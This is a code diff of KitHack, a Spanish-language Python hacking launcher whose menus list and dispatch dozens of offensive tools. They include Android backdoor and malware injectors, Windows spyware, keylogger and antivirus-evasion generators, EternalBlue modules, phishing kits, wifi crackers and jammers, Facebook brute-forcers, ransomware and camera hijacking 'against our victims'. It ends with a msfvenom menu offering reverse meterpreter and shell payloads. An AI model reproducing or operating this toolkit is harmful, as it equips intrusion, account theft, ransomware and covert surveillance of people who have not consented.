{2}Suite de Man-In-The-Middle que permite a los usuarios manipular tcp/udp.'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}26){1} FBTOOL {2}Kit de herramientas hacking de facebook'.format(WHITE, YELLOW, DEFAULT)) - print ('{0}27){1} Venom {2}Generador/compilador/controlador de shellcode (metasploit).'.format(WHITE, YELLOW, DEFAULT)) - print ('{0} 0){1} Back'.format(WHITE, YELLOW)) +def main(): + print(start_main_menu) + option = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + option = option.zfill(2) + + if option == "01": + os.system("clear") + print( + "========={0}Tool{1}==================================={0}Information{1}================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} Backdoor-apk {2}Agrega una puerta trasera a cualquier archivo APK." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}02){1} Evil-Droid {2}Genera puertas traseras para Android." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} Spade {2}Script en python que genera una puerta trasera a cualquier APK." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} AhMyth {2}Herramienta de administración remota de Android." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} Andspoilt {2}Ejecuta exploits interactivos de Android en Linux." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} Kwetza {2}Inyecta malware en aplicaciones android existentes." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} Termux {2}Emulador de terminal Android basada en Linux." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} Android-Exploits {2}Coleccion de exploits y hacks Android." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} Grabcam {2}Permite piratear la cámara de nuestras victimas con una página falsa." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} Androidpatternlock {2}Permite obtener el patrón de bloqueo en dispositivos Android." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.BackdoorApk() + + elif tool == "02": + kitools.EvilDroid() + + elif tool == "03": + kitools.Spade() + + elif tool == "04": + kitools.AhMyth() + + elif tool == "05": + kitools.Andspoilt() + + elif tool == "06": + kitools.Kwetza() + + elif tool == "07": + kitools.Termux() + + elif tool == "08": + kitools.AndroidExploits() + + elif tool == "09": + kitools.Grabcam() + + elif tool == "10": + kitools.AndroidPatternLock() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "02": + os.system("clear") + print( + "========{0}Tool{1}================================================{0}Information{1}===================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} Winpayloads {2}Generador de payloads indetectables en Windows." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}02){1} sAINT {2}Generador de spyware para sistemas Windows." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} BeeLogger {2}Generador de Keyloggers gmail para Windows." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} FakeImageExploiter {2}Inyecta malware en imagenes jpg para Windows." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} Koadic {2}Rootkit de Windows posterior a una explotacion." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} Phantom Evasion {2}Herramienta de evasion de Antivirus." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} Ps1encode {2}Generador y codificador de payloads basados en PowerShell." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} DKMC {2}Herramienta de evasion de carga maliciosa." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} Cromos {2}Inyecta codigo en extensiones legitimas de Chrome Web." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} Eternal_scanner {2}Escáner para el exploit Eternal Blue y Eternal Romance." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}11){1} EternalblueDoublepulsar {2}Módulo de Metasploit para explotar la vulnerabilidad Eternalblue-Doublepulsar." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} EternalBlueWinXPWin10 {2}Modulo de Metasploit EternalBlue desde Windows XP SP2 hasta Windows 10 Pro." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}13){1} Windows-Exploits {2}Coleccion de Exploits Windows." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.Winpayloads() + + elif tool == "02": + kitools.sAINT() + + elif tool == "03": + kitools.BeeLogger() + + elif tool == "04": + kitools.FakeImageExploiter() + + elif tool == "05": + kitools.Koadic() + + elif tool == "06": + kitools.PhantomEvasion() + + elif tool == "07": + kitools.Ps1encode() + + elif tool == "08": + kitools.DKMC() + + elif tool == "09": + kitools.Cromos() + + elif tool == "10": + kitools.EternalScanner() + + elif tool == "11": + kitools.EternalblueDoublepulsarMetasploit() + + elif tool == "12": + kitools.MS17010EternalBlueWinXPWin10() + + elif tool == "13": + kitools.WindowsExploits() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "03": + os.system("clear") + print( + "======={0}Tool{1}======================================={0}Information{1}=====================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} HiddenEye {2}Herramienta de phishing moderna con funcionalidad avanzada." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}02){1} PhishX {2}Generador de phishing y spoofing.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} SocialPhish {2}Herramienta phishing con 32 plantillas + 1 personalizable." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}04){1} SocialFish {2}Herramienta educativa de phishing.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} PhisherMan {2}Herramienta phishing con 17 plantillas." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} Spectre {2}Admite ataques de phishing casi con cualquier sitio web." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} Blackeye {2}Herramienta de phishing con 38 sitios web disponibles." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} PhEmail {2}Automatiza procesos de envío de correos electrónicos de phishing." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}09){1} Weeman {2}Servidor HTTP para phishing.".format( + WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} Zphisher {2}Herramienta de phishing automatizada.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}11){1} AIOPhish {2}Herramienta phishing con diferentes opciones." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.HiddenEye() + + elif tool == "02": + kitools.PhishX() + + elif tool == "03": + kitools.SocialPhish() + + elif tool == "04": + kitools.SocialFish() + + elif tool == "05": + kitools.PhisherMan() + + elif tool == "06": + kitools.Spectre() + + elif tool == "07": + kitools.Blackeye() + + elif tool == "08": + kitools.PhEmail() + + elif tool == "09": + kitools.Weeman() + + elif tool == "10": + kitools.Zphisher() + + elif tool == "11": + kitools.AIOPhish() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "04": + os.system("clear") + print( + "======={0}Tool{1}====================================={0}Information{1}======================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} Fluxion {2}herramienta de auditoría de redes e ingeniería social." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}02){1} Wifiphisher {2}herramienta que permite capturar contraseñas wifi mediante AP." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} Wifibroot {2}herramienta wifi Pentest Cracking para WPA/WPA2. " + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} Wifite {2}Ejecuta herramientas de auditoría inalámbrica existentes para usted." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} Ettercap {2}Interceptor/sniffer/registrador para LANs con switch." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}06){1} Linset {2}Herramienta de phishing WPA/WPA2.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} WiFi-Pumpkin {2}Framework de AP para crear facilmente redes falsas." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} Wifresti {2}Localiza tu contraseña de red inalámbrica en Windows, Linux y Mac OS." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} Evil Limiter {2}Herramienta que limita el ancho de banda de los dispositivos." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} Netool-toolkit {2}Kit de herramientas de código abierto de pentesting de MitM." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}11){1} Dracnmap {2}Herramienta que se utiliza para explotar redes y recopilar datos con nmap." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} Airgeddon {2}Script en bash para auditar redes inalambricas." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}13){1} Routersploit {2}Se compone de varios módulos que ayudan a operar pruebas de penetracion." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}14){1} Eaphammer {2}Kit para realizar ataques dirigidos contra redes WPA2-Enterprise." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}15){1} VMR-MDK {2}Script para descifrar redes inalámbricas WPS." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}16){1} Wirespy {2}Permite configurar honeypots rápidos para llevar a cabo MITMA." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}17){1} Wireshark {2}Analizador de redes que te permite capturar y navegar en el trafico de una red." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}18){1} SniffAir {2}Framework para pentesting inalámbrico." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}19){1} WifiJammer {2}Atasca continuamente todos los clientes/enrutadores wifi." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}20){1} KawaiiDeauther {2}Bloquea todos los clientes/enrutadores wifi." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.Fluxion() + + elif tool == "02": + kitools.Wifiphisher() + + elif tool == "03": + kitools.Wifibroot() + + elif tool == "04": + kitools.Wifite() + + elif tool == "05": + kitools.Ettercap() + + elif tool == "06": + kitools.Linset() + + elif tool == "07": + kitools.WiFiPumpkin() + + elif tool == "08": + kitools.Wifresti() + + elif tool == "09": + kitools.EvilLimiter() + + elif tool == "10": + kitools.NetoolToolkit() + + elif tool == "11": + kitools.Dracnmap() + + elif tool == "12": + kitools.Airgeddon() + + elif tool == "13": + kitools.Routersploit() + + elif tool == "14": + kitools.Eaphammer() + + elif tool == "15": + kitools.VMRMDK() + + elif tool == "16": + kitools.Wirespy() + + elif tool == "17": + kitools.Wireshark() + + elif tool == "18": + kitools.SniffAir() + + elif tool == "19": + kitools.WifiJammer() + + elif tool == "20": + kitools.KawaiiDeauther() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "05": + os.system("clear") + print( + "======={0}Tool{1}====================================={0}Information{1}================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} Cupp {2}Permite crear diccionarios específicamente para una persona." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}02){1} Facebooker {2}Script en perl que realiza fuerza bruta contra Facebook." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} BluForce-FB {2}Ataques de fuerza bruta en cuentas de Facebook." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} Brut3k1t {2}Ataques de fuerza bruta contra una multitud de protocolos y servicios." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} SocialBox {2}Framework de fuerza bruta [Facebook, Gmail, Instagram, Twitter]." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} John The Ripper {2}Programa que aplica fuerza bruta para descifrar contraseñas." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} Hashcat {2}Herramienta para la recuperación de contraseñas." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} Brutedum {2}Ataca SSH, FTP, Telnet, PostgreSQL, RDP, VNC con Hydra, Medusa y Ncrack." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} Facebash {2}Ataque de fuerza bruta para facebook en shellscript usando TOR." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} Brutespray {2}Automatiza el escaneo de puertos y realiza ataques por fuerza bruta." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}11){1} Pupi {2}Pupi es un generador de contraseñas simple a partir de información personal." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} B4r-brute {2}Script para crackear cuentas de Facebook usando la ID del usuario." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}13){1} Fb-Hack {2}Script de recuperación y pirateo de contraseña de Facebook." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.Cupp() + + elif tool == "02": + kitools.Facebooker() + + elif tool == "03": + kitools.BluForceFB() + + elif tool == "04": + kitools.Brut3k1t() + + elif tool == "05": + kitools.SocialBox() + + elif tool == "06": + kitools.JohnTheRipper() + + elif tool == "07": + kitools.Hashcat() + + elif tool == "08": + kitools.Brutedum() + + elif tool == "09": + kitools.Facebash() + + elif tool == "10": + kitools.Brutespray() + + elif tool == "11": + kitools.Pupi() + + elif tool == "12": + kitools.B4rbrute() + + elif tool == "13": + kitools.FbHack() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "06": + os.system("clear") + print( + "======={0}Tool{1}========================================={0}Information{1}========================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} SQLmap {2}Inyección SQL y toma de control de los servidores de bases de datos." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}02){1} XAttacker {2}Escáner de vulnerabilidades de sitios web." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} Fuxploider {2}Detecta técnicas favorables para cargar shells web o cualquier archivo malicioso." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} Wordpresscan {2}Escáner de WordPress de vulnerabilidades." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} SiteBroker {2}Recopila información y automatiza pruebas de penetración en sitios web." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} NoSQLMap {2}Explotacion de debilidades de configuración predeterminadas en bases de datos NoSQL." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} Sqli-scanner {2}Escanear de sitios web vulnerables a la inyección de SQL destinado a una lista de URL." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} Joomscan {2}Permite escanear sitios web y detectar configuraciones erroneas o deficiencias." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} Metagoofil {2}Extractor de metadatos de documentos públicos (pdf, doc, xls, ppt, etc.)." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} Sublist3r {2}Herramienta rápida de enumeración de subdominios para probadores de penetración." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}11){1} WAFNinja {2}Programa que contiene dos funciones para atacar firewalls de aplicaciones web." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} Dirsearch {2}Diseñada para directorios y archivos de fuerza bruta en sitios web." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}13){1} XSStrike {2}El escáner XSS más avanzado.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}14){1} LinksF1nd3r {2}Extractor de componentes web.".format( + WHITE, YELLOW, DEFAULT)) + print( + "{0}15){1} D-TECT {2}Herramienta moderna para realizar pentesting en sitios web." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}16){1} Phpsploit {2}Herramienta capaz de mantener el acceso a un servidor web comprometido." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.SQLmap() + + elif tool == "02": + kitools.XAttacker() + + elif tool == "03": + kitools.Fuxploider() + + elif tool == "04": + kitools.Wordpresscan() + + elif tool == "05": + kitools.SiteBroker() + + elif tool == "06": + kitools.NoSQLMap() + + elif tool == "07": + kitools.SqliScanner() + + elif tool == "08": + kitools.Joomscan() + + elif tool == "09": + kitools.Metagoofil() + + elif tool == "10": + kitools.Sublist3r() + + elif tool == "11": + kitools.WAFNinja() + + elif tool == "12": + kitools.Dirsearch() + + elif tool == "13": + kitools.XSStrike() + + elif tool == "14": + kitools.LinksF1nd3r() + + elif tool == "15": + kitools.DTECH() + + elif tool == "16": + kitools.Phpsploit() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "07": + os.system("clear") + print( + "======={0}Tool{1}====================================={0}Information{1}==================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} SpoofMAC {2}Permite modificar su direccion MAC para depurar." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}02){1} Ip_spoofing {2}ARP spoofing, HTTP spoofing && Dos.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} Arpspoof {2}Ataque de falsificación de ARP utilizando sockets del kernel de Linux." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} DerpNSpoof {2}Herramienta de suplantación de DNS simple." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} DrSpoof {2}Herramienta para detectar y detener ataques ARP Spoofing en su red local." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}06){1} GODKILLER {2}SMS-BOMBER y SMS-SENDER.".format( + WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.SpoofMAC() + + elif tool == "02": + kitools.IpSpoofing() + + elif tool == "03": + kitools.Arpspoof() + + elif tool == "04": + kitools.DerpNSpoof() + + elif tool == "05": + kitools.DrSpoof() + + elif tool == "06": + kitools.GODKILLER() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "08": + os.system("clear") + print( + "========={0}Tool{1}========================================{0}Information{1}========================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} NMAP {2}Obtiene información de los host, puertos y servicios dentro de una red." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}02){1} Th3inspector {2}Herramienta todo en uno para recopilar información." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} FBI {2}Recopilación de información confidencial en cuentas de Facebook." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} Infoga {2}Extrae información de cuentas de correo electrónico." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} Crips {2}Obtiene información sobre direcciones IP, paginas web y registros DNS." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} BillCipher {2}Recopilación de información para un sitio web o direccion IP." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} RED_HAWK {2}Herramienta para recopilar información, escanear vulnerabilidades y rastreo." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} Recon-ng {2}Herramienta precargada con gran cantidad de modulos para recopilar información." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} theHarvester {2}Recopilación de correos electrónicos, nombres, subdominios, direcciones IP y URL." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} PhoneInfoga {2}Obtiene información sobre numeros de telefono utilizando recursos gratuitos." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}11){1} Gasmask {2}Herramienta de recopilación de información todo en uno." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} URLextractor {2}Recopilación de información y reconocimiento de sitios web." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}13){1} Devploit {2}Busqueda de DNS, Whois, IP, GeoIP, subred, puertos, host, etc." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}14){1} ReconDog {2}Herramienta todo en uno para recopilar información básica." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}15){1} Webkiller {2}Kit de recopilación de información.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}16){1} Quasar {2}Framework de recopilación de información." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}17){1} Info-instagram {2}Permite extraer información de cuentas de instagram." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}18){1} UserScan {2}Scanner de indentidad con el que podras buscar cuentas que tengan un username." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}19){1} XCTR-Hacking {2}Herramientas todo en uno para la recopilación de información." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}20){1} DeadTrap {2}Herramienta OSINT para rastrear huellas de un número de teléfono." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.NMAP() + + elif tool == "02": + kitools.Th3inspector() + + elif tool == "03": + kitools.FBI() + + elif tool == "04": + kitools.Infoga() + + elif tool == "05": + kitools.Crips() + + elif tool == "06": + kitools.BillCipher() + + elif tool == "07": + kitools.RedHawk() + + elif tool == "08": + kitools.ReconNg() + + elif tool == "09": + kitools.theHarvester() + + elif tool == "10": + kitools.PhoneInfoga() + + elif tool == "11": + kitools.Gasmask() + + elif tool == "12": + kitools.URLextractor() + + elif tool == "13": + kitools.Devploit() + + elif tool == "14": + kitools.ReconDog() + + elif tool == "15": + kitools.Webkiller() + + elif tool == "16": + kitools.Quasar() + + elif tool == "17": + kitools.InfoInstagramIphone() + + elif tool == "18": + kitools.UserScan() + + elif tool == "19": + kitools.XCTRHackingTools() + + elif tool == "20": + kitools.DeadTrap() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "09": + os.system("clear") + print( + "======{0}Tool{1}===================================================={0}Information{1}=======================================" + .format(GREEN, DEFAULT)) + print( + "{0}01){1} TheFatRat {2}Herramienta que compila malware para ejecutar en Linux, Windows, Mac y Android." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}02){1} Msfpc {2}Contenedor para generar múltiples cargas útiles, según la elección de los usuarios." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}03){1} Fcrackzip {2}Script para descifrar archivos ZIP encriptados por contraseña." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}04){1} QRLjacker {2}Vector de ataque capaz de secuestrar sesiones que dependen de algun codigo QR." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}05){1} Lazy {2}Script que automatiza muchos procesos de penetracion." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}06){1} HTBINVITE {2}Generador de codigos de invitacion para HackTheBox." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}07){1} Bluepot {2}Honeypot Bluetooth escrito en Java." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}08){1} Setoolkit {2}Marco de prueba de penetración de código abierto diseñado para la ingeniería social." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}09){1} A2sv {2}Vulnerabilidad de escaneo automático a SSL." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}10){1} 4nonimizer {2}Anonimiza la IP pública utilizada para navegar por Internet mediante proveedores VPN." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}11){1} Easysploit {2}Automatización de Metasploit." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}12){1} NXcrypt {2}Inyección de malware en archivos con formato python." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}13){1} KnockMail {2}Verifica si existe un correo electronico" + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}14){1} RkHunter {2}Herramienta de Unix que detecta los rootkits, puertas traseras y exploits locales." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}15){1} HeraKeylogger {2}Chrome Keylogger Extension.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}16){1} ZLogger {2}Keylogger remoto persistente para Windows y Linux." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}17){1} Xerosploit {2}Kit de herramientas de pruebas de penetración." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}18){1} Slacksec {2}Kit basico de herramientas hacking." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}19){1} Katana-Framework {2}Unifica distintas herramientas funcionales para pruebas de penetración." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}20){1} Z0172CK-Tools {2}Hacking Tools Z0172CK.". + format(WHITE, YELLOW, DEFAULT)) + print( + "{0}21){1} Cam-Hack {2}Método avanzado para piratear la cámara de un móvil o una PC con un enlace." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}22){1} Onex {2}Biblioteca de herramientas para hackers." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}23){1} Ransom0 {2}Ransomware diseñado para buscar y cifrar datos de usuarios." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}24){1} Morpheus {2}Suite de Man-In-The-Middle que permite a los usuarios manipular tcp/udp." + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}25){1} FBTOOL {2}Kit de herramientas hacking de facebook" + .format(WHITE, YELLOW, DEFAULT)) + print( + "{0}26){1} Venom {2}Generador/compilador/controlador de shellcode (metasploit)." + .format(WHITE, YELLOW, DEFAULT)) + print("{0} 0){1} Back".format(WHITE, YELLOW)) + + tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + tool = tool.zfill(2) + + if tool == "00": + os.system("clear") + main() + + elif tool == "01": + kitools.TheFatRat() + + elif tool == "02": + kitools.Msfpc() + + elif tool == "03": + kitools.Fcrackzip() + + elif tool == "04": + kitools.QRLjacker() + + elif tool == "05": + kitools.Lazy() + + elif tool == "06": + kitools.HTBINVITE() + + elif tool == "07": + kitools.Bluepot() + + elif tool == "08": + kitools.Setoolkit() + + elif tool == "09": + kitools.A2sv() + + elif tool == "10": + kitools.Fornonimizer() + + elif tool == "11": + kitools.Easysploit() + + elif tool == "12": + kitools.NXcrypt() + + elif tool == "13": + kitools.KnockMail() + + elif tool == "14": + kitools.RkHunter() + + elif tool == "15": + kitools.HeraKeylogger() + + elif tool == "16": + kitools.ZLogger() + + elif tool == "17": + kitools.Xerosploit() + + elif tool == "18": + kitools.Slacksec() + + elif tool == "19": + kitools.Katana() + + elif tool == "20": + kitools.Z0172CKTools() + + elif tool == "21": + kitools.CamHack() + + elif tool == "22": + kitools.Onex() + + elif tool == "23": + kitools.Ransom0() + + elif tool == "24": + kitools.Morpheus() + + elif tool == "25": + kitools.FBTOOL() + + elif tool == "26": + kitools.Venom() + + else: + print("\n{}[X] OPCION INVALIDA".format(RED)) + time.sleep(1.5) + os.system("clear") + main() + + elif option == "10": + # sys msfvenom + os.system("clear") + print(msf_banner) + print("\n{0} [*] {1}Sys Payloads:\n".format(DEFAULT, GREEN)) + print("{0}[01] {1}LINUX {0}--> {2}Kithack.elf".format( + WHITE, YELLOW, RED)) + print("{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe".format( + WHITE, YELLOW, RED)) + print("{0}[03] {1}ANDROID {0}--> {2}Kithack.apk".format( + WHITE, YELLOW, RED)) + print("{0}[04] {1}MAC OS {0}--> {2}Kithack.macho".format( + WHITE, YELLOW, RED)) + print("{0}[05] {1}PHP {0}--> {2}Kithack.php".format( + WHITE, YELLOW, RED)) + print("{0}[06] {1}PYTHON {0}--> {2}Kithack.py".format( + WHITE, YELLOW, RED)) + print("{0}[07] {1}BASH {0}--> {2}Kithack.sh".format( + WHITE, YELLOW, RED)) + print("{0}[08] {1}PERL {0}--> {2}Kithack.pl".format( + WHITE, YELLOW, RED)) + print("{0}[09] {1}RUN MSFCONSOLE {0}".format(WHITE, YELLOW)) + print("{0} [0] {1}Back".format(WHITE, YELLOW)) + + sys = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + sys = sys.zfill(2) + + if sys == "00": + os.system("clear") + main() + + elif sys == "01": + print("{0}\n[*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} linux/x64/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} linux/x64/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} linux/x64/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} linux/x64/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[05]{1} linux/x64/shell_bind_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} linux/x64/shell_reverse_tcp".format( + WHITE, YELLOW)) 